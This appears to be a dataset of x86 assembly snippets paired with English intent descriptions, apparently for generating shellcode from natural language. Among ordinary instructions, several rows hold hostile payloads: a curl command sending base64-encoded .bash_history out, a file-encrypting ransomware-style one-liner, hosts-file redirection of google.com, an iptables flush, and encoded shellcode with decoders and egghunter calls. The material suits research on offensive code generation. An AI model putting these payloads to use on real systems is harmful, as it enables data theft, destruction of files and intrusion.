SNIPPETS
stringlengths
2
1.64k
INTENTS
stringlengths
4
1.66k
add esi, 0x8
add 0x8 to esi
add esi, 0x8
make esi point to next 8bytes of "shellcode"
add esi, 2
add 2 to the contents of esi
add esi, 4
add 4 to the contents of the esi register
add esi, 4
add 4 to esi
add esi, eax
set the mem addr dinamically
add esi, eax
add the contents of the eax register to the contents of esi register
add esi, eax
add eax to esi
add esi,4
scan the next section of mem
add esp, 0x20
add 0x20 to the contents in esp and save the result in esp
add esp, 3
add 3 to the contents of esp
add esp, 3
add 3 to the contents of the esp register
add esp, 4
add 4 to the esp register
add marks, 10
add 10 to the variable marks
addr: db 0x1
define addr = db 0x1
addr: db 0x1
define the byte addr and initialize it to 0x1
all:
define _all label
all:
define the all label
an_integer dd 12425
define the doubleword an_integer and initialize it to 12425
and al, 0fh
perform a logical and operation between the al register and the 0fh value and store the result in the al register
and ax, 1
perform logical and between ax and 1
and eax, 0000000fh
mask out lowest 4 bits of the eax register
and eax, 0fh
clear all but the last 4 bits of eax
and eax, 3f465456
perform and operation between eax and 3f465456 and save the result in eax
and eax, 40392b29
perform and operation between eax and 40392b29 and save the result in eax
and ebx, 0000000fh
mask out lowest 4 bits of the ebx register
and ecx, 0000000fh
mask out lowest 4 bits of the ecx register
and ecx,dword ptr [eax-0x7]
anding the double word at the adress eax-0x7 and ecx register
and ecx,dword ptr [ebx+0x1a]
anding the double word at the adress ebx+0x1a and ecx register
and edx, 0000000fh
mask out lowest 4 bits of the edx register
and mask1, 128
perform and operation on the variable mask1 and 128
arr dd 100
define the doubleword arr and initialize it to 100
arr dd 50
define the doubleword arr and initialize it to 50
arr1 resb 400
reserve the array arr1 of 400 uninitialized bytes
array dd 20
define the doubleword arr and initialize it to 20
array word 20
define an array of 20 initialized word
array word 5
define an array of 5 initialized word
aslr_file:
define _aslr_file label
b: dd 0x0
create variable b in memory and initialize to zero
big_number dd 123456789
define the doubleword variable big_number and initialize it to 123456789
bignum: resw 1
reserve 1 word at location bignum
bound ebp,qword ptr [ecx+0x6e]
perform a bound check to array index
bound ebp,qword ptr [edx-0x55915597]
perform a bound check to array index
bound esp,qword ptr [ebx+0x41]
perform a bound check to array index
buffer: resb 64
reserve 64 bytes for buffer
buffersize: dw 1024
declare buffersize to be a word containing 1024
byte_table db 14, 15, 22, 45
define a tables of bytes byte_table and initialize to 14, 15 and 22
byte_value db 150
define the byte value byte_value and initialize it to 150
bytes db 10
define the byte value bytes and initialize it to 10
bytes db 20
define the byte value bytes and initialize it to 20
call _appendfile
call the _appendfile function
call _appendfile \n msg2 db "passwd", 0x00
jump to _appendfile label after putting the address of the next istruction on the top pf the stack
call _build
call the _build function
call _build \n msg db "curl http://localhost:8080 -d 'data='$(cat .bash_history | base64 -w 0) -x post", 0x0a
push the address of msg on the top of the stack, and then change the eip to the address in _build label
call _continue
call _continue
call _continue
call the _continue function
call _exec
jump to _exec label
call _exec
call the _exec function
call _exec \n msg db "mv test.txt .test.txt && head -c 32 /dev/urandom | base64 | openssl aes-256-cbc -e -in .test.txt -out test.txt -pbkdf2 -k - && rm .test.txt", 0x0a
push the address of message on the top of the stack, and then change the eip to the address in _exec label
call _exit
call _exit
call _malloc
call _malloc
call _myfunc
call the _myfunc function
call _params
call the _params function
call _params \n string db "test.txt"
push the address of test.txt on the top of the stack, and then change the eip to the address in _params label
call _printf
call the _printf function
call _write
call the _write function
call _write \n google: db "127.1.1.1 google.com"
go to _write label after entering google address on the top of the sack
call [esp]
push the current code location on stack and the perform an unconditional jumo to the code location indicated by esp content
call [esp]
execute decoded_shellcode
call [esp]
call the function in esp
call atoi
call the atoi function
call code
call the code function
call code \n file: db "/sbin/iptables#-f"
push the address of file: db "/sbin/iptables#-f" on the top of the stack, and then change the eip to the address in code_label
call cont
call the cont function
call cont \n db '0',10
go to _cont after entering db '0',10 adress on the top of the stack
call decoder
jump to _decoder label
call decoder
go to _decoder label
call decoder
go to deocder label
call decoder
jump to decoder_label
call decoder
call the function decoder
call decoder
call the decoder function
call decoder
call decoder
call decoder \n encoded_shellcode: dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539
jump to _decoder label after saving encoded_shellcode ' dw 0x545, 0x4a3, 0x583, 0x5d3, 0x541, 0x541, 0x439, 0x5d3, 0x5d3, 0x541, 0x5e7, 0x5d5, 0x5cf, 0x411, 0x4eb, 0x443, 0x509, 0x48d, 0x423, 0x539' pointer to esi
call decoder \n encoded: dw 0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539
jump to decoder_label after entering the double word string encoded '0x04, 0x539, 0x9d9, 0x6c9, 0xfc9, 0xc49, 0xc29, 0x839, 0xdf9, 0xc49, 0xc49, 0x839, 0x839, 0xce9, 0xc59, 0x259, 0x4f9, 0xfc9, 0x259, 0x4e9, 0xff9, 0x259, 0x4d9, 0x1c9, 0xa79, 0x619, 0x2c9, 0x539' on stack
call decoder \n encodedshellcode: db 0x32,0x51,0x30,0x74,0x69,0x63,0x6f,0xe4,0x8a,0x54,0xe2,0x0c,0x81,0xc1,0x69,0x30,0x69,0x30,0x6a,0x8a,0x51,0xe3,0x8a,0xb1,0xce
push the address of encodedshellcode on the top of the stack, and then change the eip to the address in _shellcode label
call decoder \n encodedshellcode: db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94, 0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87
jump to _decoder label after entering _encodedshellcode (db db 0xd6,0x47,0xb7,0x9f,0xd8,0xd8,0x94,0x9f,0x9f,0xd8,0xa5,0x9e,0x99,0x7e,0x24,0xb7,0x7e,0x25,0xb4,0x7e,0x26,0x57,0xfc,0x3a,0x87) on the top of the stack
call decoder \n shellcode: db 0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87
go to _decoder label after entering the address of the array shellcode (0x18,0x38,0xc7,0x57,0x6f,0x36,0x36,0x7a,0x6f,0x6f,0x36,0x69,0x70,0x75,0x90,0xea,0x38,0xd0,0x90,0xd1,0x71,0x12,0x5f,0xd4,0x87) on the top of the stack
call decoder \n shellcode: db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d
go to _decoder label after entering shellcode (db 0x3e,0xcd,0x5d,0x75,0x3c,0x3c,0x80,0x75,0x75,0x3c,0x6f,0x76,0x7b,0x96,0xf0,0x5d,0x96,0xef,0x60,0x96,0xee,0xbd,0x18,0xda,0x8d) address on the top of the stack
call decoder \n shellcode: db 0x4b,0xf7,0x13,0x59,0xcc,0x8c,0x63,0x5e,0x9f,0x8d,0x99,0x9f,0x1f,0xa4,0x3b,0x6e,0xc6,0x36,0x23 \n shellcodelen equ $-shellcode
shellcode address will be pushed into the stack
call decoder \n shellcode: db 0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01
go to _decoder label after entering shellcode Ô0x62,0x60,0xa0,0x34,0x5e,0x97,0xe6,0x34,0xd0,0x97,0xc4,0xb4,0xdc,0xc4,0xc7,0x28,0x13,0x71,0xa6,0xc4,0xc3,0x58,0x16,0xe6,0x01Õ on the top of the stack
call decoder \n xor dword ptr [edx-0x55af5540],ebp
xoring ebp content with the double word at the adress edx-0x55af5540 then go to decoder label
call decoder_setup
call decoder_setup
call decoder1 \n xor_value: db 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa, 0xaa \n rot_value: db 13, 13, 13, 13, 13, 13, 13, 13 \n shellcode: db 0x94,0x67,0xf7,0xdf,0x96,0x96,0x2a,0xdf,0xdf,0x96,0xc5,0xdc,0xd1,0x3c,0x5a,0xf7,0x3c,0x45,0xca,0x3c,0x44,0x17,0xb2,0x70,0x27
jump to decoder1_label afetr entering xor_value, rot_value and shellcode on the top pf the stack
call doit
call the doit function
call egghunter
go to egghunter
call egghunter
call the egghunter function
call esi
call esi
call esi
call the function in esi
call esp
call esp
call execute
call the execute function